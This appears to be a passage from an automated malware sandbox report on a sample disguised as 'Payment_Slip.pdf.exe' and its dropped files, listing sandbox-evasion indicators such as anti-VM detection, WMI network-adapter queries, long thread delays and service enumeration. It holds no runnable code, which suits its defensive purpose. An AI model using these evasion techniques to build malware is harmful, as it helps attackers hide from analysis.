Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR

Delayed program exit found

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0040E18D Sleep,ExitProcess,		11_2_0040E18D
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0040E18D Sleep,ExitProcess,		17_2_0040E18D

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Memory allocated: A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Memory allocated: 23A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Memory allocated: 43A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Memory allocated: 8410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Memory allocated: 9410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Memory allocated: 9620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Memory allocated: A620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Memory allocated: 2EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Memory allocated: 3100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Memory allocated: 5100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Memory allocated: 8D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Memory allocated: 74E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Memory allocated: 9D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Memory allocated: AD80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe	Memory allocated: BD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\host.exe	Memory allocated: 2690000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\host.exe	Memory allocated: BD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Memory allocated: 4FA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Memory allocated: 1820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Memory allocated: 31D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Memory allocated: 51D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Memory allocated: B70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Memory allocated: 2510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Memory allocated: 4510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Memory allocated: F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Memory allocated: 29B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Memory allocated: 49B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Memory allocated: 1590000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Memory allocated: 2F30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Memory allocated: 4F30000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

14_2_0040DD85

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		11_2_004186FE
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		17_2_004186FE

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1199765
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1199655
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1199546
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1199437
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599644
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599441
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599263
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599155
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598710
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598484
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598375
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598265
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598043
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597718
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597390
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597168
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597051
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596532
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595750
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199758
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199631
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199380
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199078
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599869
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599764
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598999
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598889
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598669
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598012
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597397
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597171
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596952
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596624
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596077
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595749
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595421
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595202
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595041
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 594935
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 594820
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199672
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199530
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598662
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597358
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597029
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596593
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596156
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596046
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595937
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595827
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595714
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595588
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595250

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6663	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3087	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Window / User API: threadDelayed 1007	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Window / User API: threadDelayed 8521	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Window / User API: foregroundWindowGot 1735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe	Window / User API: threadDelayed 4895
Source: C:\Users\user\AppData\Roaming\host.exe	Window / User API: threadDelayed 4899
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Window / User API: threadDelayed 4837
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Window / User API: threadDelayed 4878
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Window / User API: threadDelayed 3777
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Window / User API: threadDelayed 6042
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Window / User API: threadDelayed 5250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Window / User API: threadDelayed 4533
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Window / User API: threadDelayed 6915
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Window / User API: threadDelayed 2929
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Window / User API: threadDelayed 5278
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Window / User API: threadDelayed 4521

